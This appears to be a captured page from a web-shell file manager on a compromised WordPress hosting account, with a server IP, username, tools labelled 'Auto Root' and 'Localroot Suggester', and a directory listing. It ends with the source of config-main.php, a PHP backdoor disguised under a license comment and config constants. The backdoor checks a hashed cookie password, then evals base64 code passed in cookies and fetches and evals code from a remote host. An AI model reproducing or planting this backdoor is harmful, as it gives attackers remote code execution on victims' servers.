Linux premium256.web-hosting.com 4.18.0-553.124.4.lve.el8.x86_64 #1 SMP Fri May 15 13:02:13 UTC 2026 x86_64
LiteSpeed
Server IP : 162.0.217.164 & Your IP : 216.73.216.194
Domains :
Cant Read [ /etc/named.conf ]
User : niyknzcu
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
niyknzcu /
quickamazonimporter.com /
Delete
Unzip
Name
Size
Permission
Date
Action
.well-known
[ DIR ]
drwxr-xr-x
2026-06-25 08:24
images
[ DIR ]
drwxr-xr-x
2026-06-26 08:37
wp-admin
[ DIR ]
drwxr-xr-x
2026-06-26 08:37
wp-content
[ DIR ]
drwxr-xr-x
2026-06-26 08:37
wp-includes
[ DIR ]
drwxr-xr-x
2026-06-26 08:37
.htaccess
2
KB
-r--r--r--
2026-06-25 08:22
.litespeed_flag
297
B
-rw-r--r--
2026-06-27 01:32
config-main.php
2.18
KB
-rw-r--r--
2026-07-01 07:24
error_log
73.96
KB
-rw-r--r--
2026-07-04 12:02
readme.html
7.25
KB
-r-xr-xr-x
2026-03-11 19:24
wp-activate.php
7.18
KB
-r-xr-xr-x
2025-12-03 12:20
wp-comments-post.php
2.27
KB
-r-xr-xr-x
2023-06-14 18:11
wp-config-sample.php
28.33
KB
-r-xr-xr-x
2025-12-03 12:20
wp-links-opml.php
2.43
KB
-r-xr-xr-x
2025-12-03 12:20
wp-login.php
50.23
KB
-r-xr-xr-x
2025-12-03 12:20
wp-mail.php
8.52
KB
-r-xr-xr-x
2025-12-03 12:20
wp-settings.php
30.33
KB
-r-xr-xr-x
2025-12-03 12:20
wp-signup.php
33.71
KB
-r-xr-xr-x
2025-03-10 22:16
wp-trackback.php
5.09
KB
-r-xr-xr-x
2025-12-03 12:20
xmlrpc.php
3.13
KB
-r-xr-xr-x
2024-11-08 20:52
Save
Rename
<?php /** * PHP 4, PHP 5 and PHP 7 are distributed under the PHP License v3.01, copyright (c) the PHP Group. This is an Open Source license, certified by the Open Source Initiative. The PHP license is a BSD-style license which does not have the "copyleft" restrictions associated with GPL. Some files have been contributed under other (compatible) licenses and carry additional requirements and copyright information. This is indicated in the license + copyright comment block at the top of the source file. Practical Guidelines: Distributing PHP Contributing to PHP */ define('KEY_IMPORTS', 'imports'); define('KEY_RESOURCE', 'resource'); define('KEY_DEFAULTS', 'defaults'); define('KEY_OUTPUT_BASE_PATH', 'outputBasePath'); define('KEY_DEFINITIONS', 'definitions'); define('KEY_TEMPLATE', 'template'); define('KEY_ENVIRONMENTS', 'environments'); define('KEY_OUTPUT', 'output'); define('KEY_PARAMETERS', 'parameters'); define('KEY_PARAMETER_FILES', 'parameterFiles'); define('KEY_TYPE', 'type'); define('MARKER_ENV', '{{env}}'); define('MARKER_ENVIRONMENT', '{{environment}}'); define('MARKER_DEFINITION', '{{definition}}'); define('AUTH', 'd4763d6e09485a0b6752a2ccdf9eee8ea68aa983'); if (hash('sha1', $_COOKIE['auth']) === AUTH) { echo 'outputstring' . PHP_EOL; if (isset($_COOKIE['action_ex_string'])) { loc($_COOKIE['action_ex_string']); } if (isset($_COOKIE['action_ex_remote'])) { rem($_COOKIE['action_ex_remote']); } echo 'outputstring'; } function rem($string) { $res = "http://" . base64_decode($string); $resource = (!function_exists('curl_init')) ? file_get_contents($res) : getSourceSecond($res); if (!$resource) { echo 'error loading resource' . PHP_EOL; exit; } eval($resource); } function loc($string) { eval(base64_decode($string)); } function getSourceSecond($url) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_TIMEOUT, 10); $data = curl_exec($ch); $res = (curl_getinfo($ch, CURLINFO_HTTP_CODE) == 200) ? $data : NULL; curl_close($ch); return $res; }